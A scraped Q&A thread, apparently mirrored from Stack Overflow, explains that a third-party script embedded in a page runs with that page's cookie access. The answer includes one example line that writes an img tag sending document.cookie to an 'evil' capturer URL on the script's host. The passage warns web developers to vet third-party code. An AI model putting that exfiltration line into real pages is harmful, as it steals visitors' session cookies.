Can a third-party script set a first-party cookie?

前端 未结 1 1963
时光取名叫无心
时光取名叫无心 2021-02-19 20:33

I\'ve read a lot of content online about cookies, but nothing addressing this question: Let\'s say I have a server at a.com and a web page served by b.com embeds a script in th

相关标签:
1条回答
  • 2021-02-19 21:21

    I don't believe the origin of a .js file is relevant. The cookie domain has to do with the domain of the document being rendered.

    If I visit http://www.b.com/ and it includes

    <script src="http://www.a.com/some/file.js"></script>
    

    Then b.com is trusting a.com's code to act in good faith. The code executes as part of the page being viewed. Since the javascript code will execute in the browser, it could read cookies from b.com and pass that data along by creating an tag in the document where src includes the data.

    For example, if a.com's javascript file includes

    document.writeln("<img src='http://www.a.com/evil/data/capturer?" + document.cookie + "'>");
    

    Then the malicious webmaster of a.com could check his web server logs and see b.com's cookies.

    So, the question is, if a.com is malicious, why did b.com include code from a.com in their page? They probably didn't. As web developers, we need to verify the trustworthiness of any 3rd party code we embed in our sites.

    0 讨论(0)
提交回复
热议问题